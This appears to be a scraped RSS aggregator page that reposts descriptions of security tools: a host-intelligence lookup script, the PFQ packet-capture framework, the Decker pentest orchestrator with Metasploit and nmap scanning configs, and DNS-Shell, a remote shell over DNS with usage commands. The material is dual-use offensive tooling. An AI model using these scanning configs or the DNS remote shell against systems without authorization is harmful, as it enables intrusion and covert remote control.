Hosts are identified by FQDN host name, Domain, or IP address. This tool only supports IPv4 at the moment. The output is in CSV format and sent to STDOUT so the data can be saved or piped into another program. Since the output is in CSV format, spreadsheets such as Excel or database systems will easily be able to import the data.
I created a short introduction for this tool on YouTube: https://youtu.be/aYK0gILDA6w
This works with Python v2, but it should also work with Python v3. If you find it does not work with Python v3 please post an issue.

Help Screen:
$ python hostintel.py -h
usage: hostintel.py [-h] [-a] [-d] [-v] [-p] [-s] [-c] [-t] [-o] [-i] [-r]
ConfigurationFile InputFile

Modular application to look up host intelligence information. Outputs CSV to
STDOUT. This application will not output information until it has finished all
of the input.

positional arguments:
ConfigurationFile Configuration file
InputFile Input file, one host per line (IP, domain, or FQDN
host name)

optional arguments:
-h, --help show this help message and exit
-a, --all Perform All Lookups.
-d, --dns DNS Lookup.
-v, --virustotal VirusTotal Lookup.
-p, --passivetotal PassiveTotal Lookup.
-s, --shodan Shodan Lookup.
-c, --censys Censys Lookup.
-t, --threatcrowd ThreatCrowd Lookup.
-o, --otx OTX by AlienVault Lookup.
-i, --isc Internet Storm Center DShield Lookup.
-r, --carriagereturn Use carriage returns with new lines on csv.

Install:
First, make sure your configuration file is correct for your computer/installation. Add your API keys and usernames as appropriate in the configuration file. Python and Pip are required to run this tool. There are modules that must be installed from GitHub, so be sure the git command is available from your command line. Git is easy to install for any platform. Next, install the python requirements (run this each time you git pull this repository too):
$ pip install -r requirements.txt
There have been some problems with the stock version of Python on Mac OSX (http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure). You may have to install the security portion of the requests library with the following command:
$ pip install requests[security]
Lastly, I am a fan of virtualenv for Python. To make a customized local installation of Python to run this tool, I recommend you read: http://docs.python-guide.org/en/latest/dev/virtualenvs/

Running:
$ python hostintel.py myconfigfile.conf myhosts.txt -a > myoutput.csv
You should be able to import myoutput.csv into any database or spreadsheet program.
Note that depending on your network, your API key limits, and the data you are searching for, this script can run for a very long time! Use each module sparingly! In return for the long wait, you save yourself from having to pull this data manually.

Sample Data:
There is some sample data in the "sampledata" directory. The IPs, domains, and hosts were picked at random and by no means is meant to target any organization or individual. Running this tool on the sample data works in the following way:

Small Hosts List:
$ python hostintel.py local/config.conf sampledata/smalllist.txt -a > sampledata/smalllist.csv
*** Processing 8.8.8.8 ***
*** Processing 8.8.4.4 ***
*** Processing 192.168.1.1 ***
*** Processing 10.0.0.1 ***
*** Processing google.com ***
*** Processing 212.227.247.242 ***
*** Writing Output ***

Larger Hosts List:
$ python hostintel.py local/config.conf sampledata/largerlist.txt -a > sampledata/largerlist.csv
*** Processing 114.34.84.13 ***
*** Processing 116.102.34.212 ***
*** Processing 118.75.180.168 ***
*** Processing 123.195.184.13 ***
*** Processing 14.110.216.236 ***
*** Processing 14.173.147.69 ***
*** Processing 14.181.192.151 ***
*** Processing 146.120.11.66 ***
*** Processing 163.172.149.131 ***

...

*** Processing 54.239.26.180 ***
*** Processing 62.141.39.155 ***
*** Processing 71.6.135.131 ***
*** Processing 72.30.2.74 ***
*** Processing 74.125.34.101 ***
*** Processing 83.31.179.71 ***
*** Processing 85.25.217.155 ***
*** Processing 93.174.93.94 ***
*** Writing Output ***

Intelligence Sources:
You can get API keys at the sites below for your configuration file.

Resources:

Notes:
Crude notes are available here.


PFQ - Functional Network Framework For Multi-Core Architectures

$
0
0

PFQ is a functional framework designed for the Linux operating system built for efficient packets capture/transmission (10G, 40G and beyond), in-kernel functional processing, kernel-bypass and packets steering across groups of sockets/end-points.
It is highly optimized for multi-core architecture, as well as for network devices equipped with multiple hardware queues. Compliant with any NIC, it provides a script that generates accelerated network device drivers starting from the source code.
PFQ enables the development of high-performance network applications, and it is shipped with a custom version of libpcap that accelerate and parallelize legacy applications. Besides, a pure functional language designed for early stages in-kernel packet processing is included: pfq-lang.
Pfq-Lang is inspired by Haskell and is intended to define applications that run on top of network device drivers. Through pfq-lang it is possible to build efficient bridges, port mirrors, simple firewalls, network balancers and so forth.
The framework includes the source code of the PFQ kernel module, user-space libraries for C, C++11-14, Haskell language, an accelerated pcap library, an implementation of pfq-lang as eDSL for C++/Haskell, an experimental pfq-lang compiler and a set of diagnostic tools.

Features
  • Data-path with full lock-free architecture.
  • Preallocated pools of socket buffers.
  • Compliant with a plethora of network devices drivers.
  • Rx and Tx line-rate on 10-Gbit links (14,8 Mpps), tested with Intel ixgbe vanilla drivers.
  • Transparent support of kernel threads for asynchronous packets transmission.
  • Transmission with active timestamping.
  • Groups of sockets which enable concurrent monitoring of multiple multi-threaded applications.
  • Per-group packet steering through randomized hashing or deterministic classification.
  • Per-group Berkeley and VLAN filters.
  • User-space libraries for C, C++11-14 and Haskell language.
  • Functional engine for in-kernel packet processing with pfq-lang.
  • pfq-lang eDLS for C++11-14 and Haskell language.
  • pfq-lang compiler used to parse and compile pfq-lang programs.
  • Accelerated pcap library for legacy applications (line-speed tested with captop).
  • I/O user<->kernel memory-mapped communications allocated on top of HugePages.
  • pfqd daemon used to configure and parallelize (pcap) legacy applications.
  • pfq-omatic script that automatically accelerates vanilla drivers.

Publications
  • "PFQ: a Novel Engine for Multi-Gigabit Packet Capturing With Multi-Core Commodity Hardware": Best-Paper-Award at PAM2012, paper avaiable from here
  • "A Purely Functional Approach to Packet Processing": ANCS 2014 Conference (October 2014, Marina del Rey)
  • "Network Traffic Processing with PFQ": JSAC-SI-MT/IEEE journal Special Issue on Measuring and Troubleshooting the Internet (March 2016)
  • "Enabling Packet Fan--Out in the libpcap Library for Parallel Traffic Processing": Network Traffic Measurement and Analysis Conference (TMA 2017)
  • "A Pipeline Functional Language for Stateful Packet Processing": IEEE International Workshop on NEtwork Accelerated FunctIOns (NEAF-IO '17)
  • "The Acceleration of OfSoftSwitch": IEEE Conference on Network Function Virtualization and Software Defined Networks (NFV-SDN '17)

Invited talks
  • "Functional Network Programming" at Tyrrhenian International Workshop on Digital Communication - (Sep. 2016)
  • "Software Accelerations for Network Applications" at NetV IRISA / Technicolor Workshop on Network Virtualization (Feb. 2017)

Author
Nicola Bonelli nicola@pfq.io

Contributors (in chronological order)
Andrea Di Pietro andrea.dipietro@for.unipi.it
Loris Gazzarrini loris.gazzarrini@iet.unipi.it
Gregorio Procissi g.procissi@iet.unipi.it
Giacomo Volpi volpi.gia@gmail.com
Luca Abeni abeni@dit.unitn.it
Tolysz tolysz@gmail.com
LSB leebutterman@gmail.com
Andrey Korolyov andrey@xdel.ru
MrClick valerio.click@gmx.com
Paul Emmerich emmericp@net.in.tum.de
Bach Le bach@bullno1.com
Marian Jancar jancar.marian@gmail.com
nizq ni.zhiqiang@gmail.com
Giuseppe Sucameli brush.tyler@gmail.com
Sergio Borghese s.borghese@netresults.it
Fabio Del Vigna fabio.delvigna@larthia.com

HomePages
PFQ home-page is www.pfq.io


Decker - Declarative Penetration Testing Orchestration Framework

$
0
0

Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.

Example of a decker config file:
// variables are pulled from environment
// ex: DECKER_TARGET_HOST
// they will be available throughout the config files as var.*
// ex: ${var.target_host}
variable "target_host" {
type = "string"
}

// resources refer to plugins
// resources need unique names so plugins can be used more than once
// they are declared with the form: 'resource "plugin_name" "unique_name" {}'
// their outputs will be available to others using the form unique_name.*
// ex: nmap.443
resource "nmap" "nmap" {
host = "${var.target_host}"
plugin_enabled = "true"
}
resource "sslscan" "sslscan" {
host = "${var.target_host}"
plugin_enabled = "${nmap.443 == "open"}"
}
Run a plugin for each item in a list:
variable "target_host" {
type = "string"
}
resource "nslookup" "nslookup" {
dns_server = "8.8.4.4"
host = "${var.target_host}"
}
resource "metasploit" "metasploit" {
for_each = "${nslookup.ip_address}"
exploit = "auxiliary/scanner/portscan/tcp"
options = {
RHOSTS = "${each.key}/32"
INTERFACE = "eth0"
}
}
Complex configuration combining for_each with nested values:
variable "target_host" {
type = "string"
}
resource "nslookup" "nslookup" {
dns_server = "8.8.4.4"
host = "${var.target_host}"
}
resource "nmap" "nmap" {
for_each = "${nslookup.ip_address}"
host = "${each.key}"
}
// for each IP, check if nmap found port 25 open.
// if yes, run metasploit's smtp_enum scanner
resource "metasploit" "metasploit" {
for_each = "${nslookup.ip_address}"
exploit = "auxiliary/scanner/smtp/smtp_enum"
options = {
RHOSTS = "${each.key}"
}
plugin_enabled = "${nmap["${each.key}"].25 == "open"}"
}

Output formats
Several output formats are available and more than one can be selected at the same time.
Setting DECKER_OUTPUTS_JSON or DECKER_OUTPUTS_XML to "true" will output json and xml formatted files respectively.
  1. Output .json files in addition to plain text: export DECKER_OUTPUTS_JSON="true"
  2. Output .xml files in addition to plain text: export DECKER_OUTPUTS_XML="true"

Why the name decker?
My friend Courtney came to the rescue when I was struggling to come up with a name and found decker in a SciFi word glossary... and it sounded cool.
A future cracker; a software expert skilled at manipulating cyberspace, especially at circumventing security precautions.

Running an example config with docker
Two volumes are mounted:
  1. Directory named decker-reports where decker will output a file for each plugin executed. The file's name will be {unique_resource_name}.report.txt.
  2. examples directory containing decker config files. Mounting this volume allows you to write configs locally using your favorite editor and still run them within the container.
One environment variable is passed in:
  1. DECKER_TARGET_HOST
This is referenced in the config files as {var.target_host}. Decker will loop through all environment variables named DECKER_*, stripping away the prefix and setting the rest to lowercase.
docker run -it --rm \
-v "$(pwd)/decker-reports/":/tmp/reports/ \
-v "$(pwd)/examples/":/decker-config/ \
-e DECKER_TARGET_HOST=example.com \
stevenaldinger/decker:kali decker ./decker-config/example.hcl
When decker finishes running the config, look in ./decker-reports for the outputs.

Running an example config without docker
You'll likely want to set the directory decker writes reports to with the DECKER_REPORTS_DIR environment variable.
Something like this would be appropriate. Just make sure whatever you set it to is an existing directory.
export DECKER_REPORTS_DIR="$HOME/decker-reports"
You'll also need to set a target host if you're running one of the example config files.
export DECKER_TARGET_HOST="<insert hostname here>"
Then just run a config file. Change to the root directory of this repo and run:
./decker ./examples/example.hcl

Contributing
Contributions are very welcome and appreciated. See docs/contributions.md for guidelines.

Development
Using docker for development is recommended for a smooth experience. This ensures all dependencies will be installed and ready to go.
Refer to Directory Structure below for an overview of the go code.

Quick Start
  1. (on host machine): make docker_build
  2. (on host machine): make docker_run (will start docker container and open an interactive bash session)
  3. (inside container): dep ensure -v
  4. (inside container): make build_all
  5. (inside container): make run

Initialize git hooks
Run make init to add a pre-commit script that will run linting and tests on each commit.

Plugin Development
Decker itself is just a framework that reads config files, determines dependencies in the config files, and runs plugins in an order that ensures plugins with dependencies on other plugins (output of one plugin being an input for another) run after the ones they depend on.
The real power of decker comes from plugins. Developing a plugin can be as simple or as complex as you want it to be, as long as the end result is a .so file containing the compiled plugin code and a .hcl file in the same directory declaring the inputs the plugin is expecting a user to configure.
The recommended way to get started with decker plugin development is by cloning the decker-plugin repository and following the steps in its documentation. It should only take you a few minutes to get a "Hello World" decker plugin running.

Installing plugins
By default, plugins are expected to be in a directory relative to wherever the deckerbinary is, at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.so. Additional paths can be added by setting the DECKER_PLUGIN_DIRS environment variable. The default plugin path will still be used if DECKER_PLUGIN_DIRS is set.
Example: export DECKER_PLUGIN_DIRS="/path/to/my/plugins:/additional/path/to/plugins"
There should be an HCL file next to the .so file at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.hcl that defines its inputs and outputs. Currently, only string, list, and map inputs are supported. Each input should have an input block that looks like this:
input "my_input" {
type = "string"
default = "some default value"
}

Directory Structure
.
├── build
│   ├── ci/
│   └── package/
├── cmd
│   ├── decker
│   │   └── main.go
│   └── README.md
├── deployments/
├── docs/
├── examples
│   └── example.hcl
├── githooks
│   ├── pre-commit
├── Gopkg.toml
├── internal
│   ├── app
│   │   └── decker
│   │   └── plugins
│   │   ├── a2sv
│   │   │   ├── a2sv.hcl
│   │   │   ├── main.go
│   │   │   └── README.md
│   │   └── ...
│   │   ├── main.go
│   │   ├── README.md
│   │   └── xxx.hcl
│   ├── pkg
│   │   ├── dependencies/
│   │   ├── gocty/
│   │   ├── hcl/
│   │   ├── paths/
│   │   ├── plugins/
│   │   └── reports/
│   └── README.md
├── LICENSE
├── Makefile
├── README.md
└── scripts
├── build-plugins.sh
└── README.md
  • cmd/decker/main.go is the driver. Its job is to parse a given config file, load the appropriate plugins based on the file's resource blocks, and run the plugins with the specified inputs.
  • examples has a couple example configurations to get you started with decker. If you use the kali docker image (stevenaldinger/decker:kali), all dependencies should be installed for all config files and things should run smoothly.
  • internal/pkg is where most of the actual code is. It contains all the packages imported by main.go.
    • dependencies is responsible for building the plugin dependency graph and returning a topologically sorted array that ensures plugins are run in a working order.
    • gocty offers helpers for encoding and decoding go-cty values which are used to handle dynamic input types.
    • hcl is responsible for parsing HCL files, including creating evaluation contexts that let blocks properly decode when they depend on other plugin blocks.
    • paths is responsible for returning file paths for the decker binary, config files, plugin config files, and generated reports.
    • plugins is responsible for determining if plugins are enabled and running them.
    • reports is responsible for writing reports to the file system.
  • internal/app/decker/plugins are modular pieces of code written as Golang plugins, implementing a simple interface that allows them to be loaded and called at run-time with inputs and outputs specified in the plugin's config file (also in HCL). An example can be found at internal/app/decker/plugins/nslookup/nslookup.hcl.
  • decker config files offer a declarative way to write penetration tests. The manifests are written in HashiCorp Configuration Language 2) and describe the set of plugins to be used in the test as well as their inputs.


DNS-Shell - An Interactive Shell Over DNS Channel

$
0
0

DNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded PowerShell command.

Understanding DNS-Shell
The Payload is generated when the sever script is invoked and it simply utilizes nslookup to perform the queries and query the server for new commands the server then listens on port 53 for incoming communications, once payload is executed on the target machine the server will spawn an interactive shell.
Once the channel is established the payload will continously query the server for commands if a new command is entered, it will execute it and return the result back to the server.

Using DNS-Shell
Running DNS-Shell is relatively simple
DNS-Shell supports two mode of operations direct and recursive modes:
  • Perform a git clone from our DNS-shell Github page
  • DNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP]
  • DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain]


Viewing all 5837 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>